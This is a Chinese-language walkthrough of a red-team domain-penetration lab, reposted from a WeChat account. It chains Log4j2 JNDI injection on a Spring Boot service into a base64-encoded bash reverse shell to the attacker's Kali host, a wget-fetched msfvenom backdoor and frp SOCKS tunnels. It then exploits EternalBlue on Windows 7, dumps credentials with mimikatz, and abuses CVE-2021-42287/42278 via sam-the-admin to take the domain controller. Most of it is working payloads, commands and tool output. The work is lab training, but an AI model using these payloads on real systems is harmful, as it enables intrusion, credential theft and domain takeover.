内网靶场 | 渗透攻击红队内网域渗透靶场-2

admin
admin
admin
138107
文章
113
评论
2024年3月27日22:29:54评论76 views字数 17419阅读58分3秒阅读模式

 这次的靶场相对于上一次的较为简单,靶场是21年的,对于当时来说Log4j2 RCE、CVE-2021-42287&CVE-2021-42278都算是比较新的漏洞,正好也摸索一下这几个经典漏洞的利用方法,文章仅供学习参考,大佬勿喷。本期文章靶场来自公众号:渗透攻击红队。

声明:本文章仅对个人学习过程进行记录总结,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

01

环境简介

内网靶场 | 渗透攻击红队内网域渗透靶场-2

  • 攻击机:

    • Kali Linux:172.20.4.153

  • 靶机:

    • Ubuntu 16:172.20.4.146,10.0.1.6

    • Windows 7:10.0.1.7,10.0.0.7

    • Windows Server 2012:10.0.0.12

02


外网打点

信息收集

使用御剑高速TCP端口扫描工具对172.20.4.146进行扫描

内网靶场 | 渗透攻击红队内网域渗透靶场-2

目标机器开放了22和38080端口

22端口是ssh服务端口

浏览器访问一下38080端口

内网靶场 | 渗透攻击红队内网域渗透靶场-2

通过网站的icon可以判断应该是一个springboot架构的网站,可以测试一下CVE-2021-44228

CVE-2021-44228 Log4j2 RCE

使用http://dnslog.cn/生成一个子域名

内网靶场 | 渗透攻击红队内网域渗透靶场-2

访问http://172.20.4.146:38080/hello抓包,post提交

payload=${jndi:ldap://io1ctr.dnslog.cn/test}

内网靶场 | 渗透攻击红队内网域渗透靶场-2

或者使用curl

curl 172.20.4.146:38080/hello -X POST -d 'payload=${jndi:ldap://io1ctr.dnslog.cn/test}'

DNSLog中有记录,则说明存在CVE-2021-44228

内网靶场 | 渗透攻击红队内网域渗透靶场-2

进行漏洞利用:

在Kali中使用JNDIExploit-2.0-SNAPSHOT.jar开启HTTP服务和LDAP服务

java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 172.20.4.16Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true[+] LDAP Server Start Listening on 1389...[+] HTTP Server Start Listening on 8080...

监听本地的2222端口

nc -lvnp 2222

https://forum.ywhack.com/shell.php在线生成反弹shell命令

bash -i >& /dev/tcp/172.20.4.153/2222 0>&1

反弹shell命令进行base64编码

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx

Brupsuite重放数据包,POST提交反弹shell payload

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

内网靶场 | 渗透攻击红队内网域渗透靶场-2

这里Kali没有监听到shell,查看LDAP服务的监听发现payload没有被正确解码

内网靶场 | 渗透攻击红队内网域渗透靶场-2

因为+号被识别为空格了,将+替换成双重URL编码

%252b# %25为%的URL编码# %2b为+的URL编码

最终的payload为

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

发包

内网靶场 | 渗透攻击红队内网域渗透靶场-2

设置的LDAP服务的监听中也可以看到执行了想要执行的命令

内网靶场 | 渗透攻击红队内网域渗透靶场-2

成功将shell反弹到了2222端口

内网靶场 | 渗透攻击红队内网域渗透靶场-2

尝试使用ifconfig命令查看网络信息发现没有该命令

内网靶场 | 渗透攻击红队内网域渗透靶场-2

可能当前是在docker环境中

查看一下根目录是否有.dockerenv文件

ls / -a

内网靶场 | 渗透攻击红队内网域渗透靶场-2

查看/proc/self/cgroup

cat /proc/self/cgroup

内网靶场 | 渗透攻击红队内网域渗透靶场-2

基本可以确定是在docker环境中了

查看是否存用特权模式启动

root@cc4ddedd1727:/demo# cat /proc/self/status |grep Capcat /proc/self/status |grep CapCapInh: 00000000a80425fbCapPrm: 00000000a80425fbCapEff: 00000000a80425fbCapBnd: 00000000a80425fbCapAmb: 0000000000000000

若以特权模式启动,CapEff对应的掩码值应为0000003fffffffff,这里明显不是,无法利用privileged特权模式启动容器逃逸

查看历史命令

history

内网靶场 | 渗透攻击红队内网域渗透靶场-2

可以看到在/root/目录下有个flag.txt

查看/root/flag.txt

内网靶场 | 渗透攻击红队内网域渗透靶场-2

拿到了第一个flag:flag{redteam.lab-1}

并给出了一个账号和密码:saul:Saul123

尝试SSH登录目标机器

内网靶场 | 渗透攻击红队内网域渗透靶场-2

查看当前机器网络配置信息

saul@ubantu:~$ ifconfigdocker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255        inet6 fe80::42:73ff:fe04:9380  prefixlen 64  scopeid 0x20<link>        ether 02:42:73:04:93:80  txqueuelen 0  (以太网)        RX packets 1261  bytes 209556 (209.5 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 1115  bytes 579027 (579.0 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.20.4.146  netmask 255.255.252.0  broadcast 172.20.7.255        inet6 fe80::ef82:7216:f2f7:4513  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:8b:87:63  txqueuelen 1000  (以太网)        RX packets 379040  bytes 26105962 (26.1 MB)        RX errors 0  dropped 3  overruns 0  frame 0        TX packets 147717  bytes 9097485 (9.0 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 10.0.1.6  netmask 255.255.255.255  broadcast 10.0.1.6        inet6 fe80::aaea:89b9:79db:6b9c  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:8b:87:6d  txqueuelen 1000  (以太网)        RX packets 442  bytes 35349 (35.3 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 70  bytes 7746 (7.7 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1000  (本地环回)        RX packets 483  bytes 58742 (58.7 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 483  bytes 58742 (58.7 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0veth94a6d8d: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet6 fe80::249c:25ff:fe0f:7adf  prefixlen 64  scopeid 0x20<link>        ether 26:9c:25:0f:7a:df  txqueuelen 0  (以太网)        RX packets 1261  bytes 227210 (227.2 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 1154  bytes 583247 (583.2 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

存在一张IP为10.0.1.6的网卡

查看当前用户是否有sudo权限

sudo -l# 或者grep -Po '^sudo.+:K.*$' /etc/group

内网靶场 | 渗透攻击红队内网域渗透靶场-2

03


内网渗透

内网信息收集

使用ping命令配合for循环探测一下内网的存活主机

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

内网靶场 | 渗透攻击红队内网域渗透靶场-2

可以看到10.0.1.x网段还有一台10.0.1.7主机

为了方便后续渗透,将当前机器上线到MSF

Kali中生成Linux后门

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.20.4.153  LPORT=1111 -f elf > 1111.elf

用python开一个http服务

python3 -m http.server 80

跳板机上wegt下载后门

wget http://172.20.4.153/1111.elf

内网靶场 | 渗透攻击红队内网域渗透靶场-2

给1111.elf赋予执行权限

chmod +x 1111.elf

MSF设置监听

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 172.20.4.153msf6 exploit(multi/handler) > set lport 1111msf6 exploit(multi/handler) > run

跳板机上以root权限执行1111.elf

sudo ./1111.elf

MSF收到会话

内网靶场 | 渗透攻击红队内网域渗透靶场-2

上传frpc和frpc.ini

内网靶场 | 渗透攻击红队内网域渗透靶场-2

frpc.ini配置

[common]server_addr = 172.20.4.153server_port = 7000[plugin_socks]type = tcpremote_port = 1080plugin = socks5

Kali执行

frps -c frps.ini

frps.ini配置

[common]bind_addr = 0.0.0.0bind_port = 7000

进入目标机器的shell,执行

frpc -c frpc.ini

在kali中能看到代理连接成功

内网靶场 | 渗透攻击红队内网域渗透靶场-2

设置MSF全局代理

msf6 > setg Proxies socks5:172.20.4.153:1080msf6 > setg ReverseAllowProxy true

nmap走代理扫描10.0.1.7

proxychains4 nmap -v -Pn -T3 -sV -n -sT --open 10.0.1.7......Nmap scan report for 10.0.1.7Host is up (0.0054s latency).Not shown: 992 closed tcp ports (conn-refused)PORT      STATE SERVICE      VERSION135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: REDTEAM)49152/tcp open  msrpc        Microsoft Windows RPC49153/tcp open  msrpc        Microsoft Windows RPC49154/tcp open  msrpc        Microsoft Windows RPC49155/tcp open  msrpc        Microsoft Windows RPC49156/tcp open  msrpc        Microsoft Windows RPCService Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows......

使用MSF的smb_version模块探测10.0.1.7主机的信息

meterpreter > background msf6 > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(scanner/smb/smb_version) > set rhost 10.0.1.7msf6 auxiliary(scanner/smb/smb_version) > set THREADS 20msf6 auxiliary(scanner/smb/smb_version) > run

内网靶场 | 渗透攻击红队内网域渗透靶场-2

经典的Windows 7 Ultimate SP1,可以尝试测试永恒之蓝

永恒之蓝

使用ms17_010_eternalblue模块

msf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.1.7msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 2222msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] 10.0.1.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.0.1.7:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.0.1.7:445          - Scanned 1 of 1 hosts (100% complete)[+] 10.0.1.7:445 - The target is vulnerable.[*] 10.0.1.7:445 - Connecting to target for exploitation.[+] 10.0.1.7:445 - Connection established for exploitation.[+] 10.0.1.7:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.0.1.7:445 - CORE raw buffer dump (38 bytes)[*] 10.0.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima[*] 10.0.1.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service [*] 10.0.1.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          [+] 10.0.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.0.1.7:445 - Trying exploit with 12 Groom Allocations.[*] 10.0.1.7:445 - Sending all but last fragment of exploit packet[*] 10.0.1.7:445 - Starting non-paged pool grooming[+] 10.0.1.7:445 - Sending SMBv2 buffers[+] 10.0.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.0.1.7:445 - Sending final SMBv2 buffers.[*] 10.0.1.7:445 - Sending last fragment of exploit packet![*] 10.0.1.7:445 - Receiving response from exploit packet[+] 10.0.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.0.1.7:445 - Sending egg to corrupted connection.[*] 10.0.1.7:445 - Triggering free of corrupted buffer.[*] Started bind TCP handler against 10.0.1.7:2222[*] Sending stage (201798 bytes) to 10.0.1.7[*] Meterpreter session 2 opened (172.20.4.153:36881 -> 172.20.4.153:1080) at 2024-03-26 21:41:40 +0800[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter > sysinfoComputer        : WIN7OS              : Windows 7 (6.1 Build 7601, Service Pack 1).Architecture    : x64System Language : zh_CNDomain          : REDTEAMLogged On Users : 3Meterpreter     : x64/windows

成功拿到WIN7的SYSTEM权限

获取桌面的flag

meterpreter > shellProcess 3068 created.Channel 1 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:Windowssystem32>chcp 65001chcp 65001Active code page: 65001C:Windowssystem32>type C:UsersrootDesktopflag.txttype C:UsersrootDesktopflag.txtflag{redteam.lab-2}

查看网络配置信息

C:Windowssystem32>ipconfig /allipconfig /allWindows IP Configuration   Host Name . . . . . . . . . . . . : win7   Primary Dns Suffix  . . . . . . . : redteam.lab   Node Type . . . . . . . . . . . . : Hybrid   IP Routing Enabled. . . . . . . . : No   WINS Proxy Enabled. . . . . . . . : No   DNS Suffix Search List. . . . . . : redteam.labEthernet adapter �������� 2:   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2   Physical Address. . . . . . . . . : 00-0C-29-41-6F-CB   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::8892:5d29:728e:423d%13(Preferred)    IPv4 Address. . . . . . . . . . . : 10.0.0.7(Preferred)    Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 10.0.0.1   DHCPv6 IAID . . . . . . . . . . . : 301993001   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44   DNS Servers . . . . . . . . . . . : 10.0.0.12   NetBIOS over Tcpip. . . . . . . . : EnabledEthernet adapter ��������:   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection   Physical Address. . . . . . . . . : 00-0C-29-41-6F-C1   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::9ce9:b7fa:afb2:f8ab%11(Preferred)    IPv4 Address. . . . . . . . . . . : 10.0.1.7(Preferred)    Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 10.0.1.1   DHCPv6 IAID . . . . . . . . . . . : 234884137   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44   DNS Servers . . . . . . . . . . . : 10.0.1.7   NetBIOS over Tcpip. . . . . . . . : EnabledTunnel adapter isatap.{88DB6121-0924-4160-B2C6-608488C461A8}:   Media State . . . . . . . . . . . : Media disconnected   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Microsoft ISATAP Adapter   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : YesTunnel adapter isatap.{8D95A122-4FF1-4BCD-B20F-F04CD81A7E1E}:   Media State . . . . . . . . . . . : Media disconnected   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes

可以看到当前机器在redteam.lab域中,还存在一张网卡IP为10.0.0.7

尝试抓取密码

meterpreter > load kiwi Loading extension kiwi...  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ##  / ##       > http://blog.gentilkiwi.com/mimikatz '## v ##'        Vincent LE TOUX            ( [email protected] )  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/Success.meterpreter > creds_all[+] Running as SYSTEM[*] Retrieving all credentialsmsv credentials===============Username  Domain   LM                                NTLM                              SHA1--------  ------   --                                ----                              ----WIN7$     REDTEAM                                    ac9018bcd329a8f4c85026b33d5bafa0  d7658d331b07b9a1da6cd48a833e37d925cf4029hong      win7     aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709root      REDTEAM  f772a42242b3f72c9c5014ae4718a7ee  41ed68671702fa84d38084b5d60cc33d  361dc644072bfbda76ae5690919f65bb6b36e0d8wdigest credentials===================Username  Domain   Password--------  ------   --------(null)    (null)   (null)WIN7$     REDTEAM  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b 7c                   65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 57 d1 9c                   60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76 1a 2b 73 17                   8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc 4e a8 5f 20 ce                   ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3hong      win7     (null)root      REDTEAM  Red12345tspkg credentials=================Username  Domain   Password--------  ------   --------hong      win7     (null)root      REDTEAM  Red12345kerberos credentials====================Username  Domain       Password--------  ------       --------(null)    (null)       (null)hong      win7         (null)root      REDTEAM.LAB  Red12345win7$     REDTEAM.LAB  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b                        7c 65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 5                       7 d1 9c 60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76                       1a 2b 73 17 8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc                        4e a8 5f 20 ce ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3

得到一个域用户redteamroot的明文密码:Red12345

上传fscan扫描10.0.0.0/24

meterpreter > upload fscan.exe[*] Uploading  : /root/桌面/fscan.exe -> fscan.exe[*] Uploaded 5.18 MiB of 5.18 MiB (100.0%): /root/桌面/fscan.exe -> fscan.exe[*] Completed  : /root/桌面/fscan.exe -> fscan.exemeterpreter > shellProcess 3016 created.Channel 3 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:Windowssystem32>chcp 65001chcp 65001Active code page: 65001C:Windowssystem32>fscan.exe -h 10.0.0.0/24fscan.exe -h 10.0.0.0/24   ___                              _      / _      ___  ___ _ __ __ _  ___| | __  / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <    ____/     |___/___|_|  __,_|___|_|_                        fscan version: 1.8.1start infoscan(icmp) Target 10.0.0.7        is alive(icmp) Target 10.0.0.12       is alive[*] Icmp alive hosts len is: 210.0.0.7:139 open10.0.0.7:135 open10.0.0.12:88 open10.0.0.12:445 open10.0.0.7:445 open10.0.0.12:139 open10.0.0.12:135 open[*] alive ports len is: 7start vulscan[+] 10.0.0.7    MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)[+] NetInfo:[*]10.0.0.7   [->]win7   [->]10.0.1.7   [->]10.0.0.7[+] NetInfo:[*]10.0.0.12   [->]DC   [->]10.0.0.12[*] 10.0.0.7             __MSBROWSE__WIN7              Windows 7 Ultimate 7601 Service Pack 1[+] 10.0.0.12   MS17-010        (Windows Server 2012 R2 Datacenter 9600)[*] 10.0.0.12      [+]DC REDTEAMDC                Windows Server 2012 R2 Datacenter 9600已完成 7/7[*] 扫描结束,耗时: 9.0503873s

10.0.0.x网段下只有一台域控机器DC,IP为10.0.0.12,系统为Windows Server 2012 R2

CVE-2021-42287&CVE-2021-42278拿下域控

参考:只需要一个域用户即可拿到 DC 权限(CVE-2021-42287 and CVE-2021-42278)

  • CVE-2021-42278:机器账户的名字一般来说应该以$结尾,但AD没有对域内机器账户名做验证

  • CVE-2021-42287:与上述漏洞配合使用,创建与DC机器账户名字相同的机器账户(不以$结尾),账户请求一个TGT后,更名账户,然后通过S4U2self申请TGS Ticket,接着DC在TGS_REP阶段,这个账户不存在的时候,DC会使用自己的密钥加密TGS Ticket,提供一个属于该账户的PAC,然后就可以得到一个高权限ST

先在MSF中添加路由

meterpreter > run get_local_subnets[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.0.0.0/255.255.255.0Local subnet: 10.0.1.0/255.255.255.0......meterpreter > run autoroute -s 10.0.0.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.0.0/255.255.255.0...[+] Added route to 10.0.0.0/255.255.255.0 via 10.0.1.7[*] Use the -p option to list all active routesmeterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table====================   Subnet             Netmask            Gateway   ------             -------            -------   10.0.0.0           255.255.255.0      Session 2

再开启一个MSF的socks5代理

msf6 > use auxiliary/server/socks_proxy# 将端口设为1081,因为1080端口被frp的socks5代理占用msf6 auxiliary(server/socks_proxy) > set srvport 1081msf6 auxiliary(server/socks_proxy) > run

修改proxychains4配置文件

vim /etc/proxychains4.conf# 在最下面添加socks5 172.20.4.153 1081

下载EXP:https://github.com/WazeHell/sam-the-admin

使用刚才抓取到的域用户配合EXP走socks5进行攻击

proxychains4 python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:389  ...  OK[-] WARNING: Target host is not a DC[*] Selected Target dc.redteam.lab[*] Total Domain Admins 1[*] will try to impersonate Administrator[*] Current ms-DS-MachineAccountQuota = 10[*] Adding Computer Account "SAMTHEADMIN-34$"[*] MachineAccount "SAMTHEADMIN-34$" password = JS6Kp%FldoHZ[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:135  ...  OK[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK[*] Successfully added machine account SAMTHEADMIN-34$ with password JS6Kp%FldoHZ.[*] SAMTHEADMIN-34$ object = CN=SAMTHEADMIN-34,CN=Computers,DC=redteam,DC=lab[*] SAMTHEADMIN-34$ sAMAccountName == dc[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[*] Saving ticket in dc.ccache[*] Resting the machine account to SAMTHEADMIN-34$[*] Restored SAMTHEADMIN-34$ sAMAccountName to original value[*] Using TGT from cache[*] Impersonating Administrator[*]     Requesting S4U2self[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[*] Saving ticket in Administrator.ccache[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK[-] The NETBIOS connection with the remote host timed out.[*] You can deploy a shell when you want using the following command:[$] KRB5CCNAME='Administrator.ccache' /usr/bin/impacket-smbexec -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

没有直接获取到shell,但是最后给了提示

可以设置Kerberos凭据缓存文件为Administrator.ccache

然后使用impacket中的smbexec来获取shell

# 导入凭据export KRB5CCNAME=Administrator.ccache# 获取shellproxychains4 python3 smbexec.py -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

内网靶场 | 渗透攻击红队内网域渗透靶场-2

获取到了域控的system权限,读取桌面上的flag

type c:usersadministratordesktopflag.txt

内网靶场 | 渗透攻击红队内网域渗透靶场-2

至此拿下该靶场所有机器

04


靶场总结

从外网的入口利用CVE-2021-44228 Log4j2 RCE拿下的shell在docker环境中,一般可以先尝试一些常规的docker逃逸方法,也可以就当前环境进行信息收集,看看有没有可以利用的信息。通过泄露的用户名密码SSH登录目标主机,获取到root权限,再以外网机器做跳板来访问内网,这里打MS17-010的时候遇到了一点坑:使用MSF中的socks_proxy模块的代理打不到WIN7机器的shell,最后还是使用frp建立的socks5隧道才上线MSF。打域控利用到的是CVE-2021-42287&CVE-2021-42278的组合拳,利用github上的EXP一键getshell

原文始发于微信公众号(XiAnG学安全):内网靶场 | 渗透攻击红队内网域渗透靶场-2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月27日22:29:54
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   内网靶场 | 渗透攻击红队内网域渗透靶场-2https://cn-sec.com/archives/2608631.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息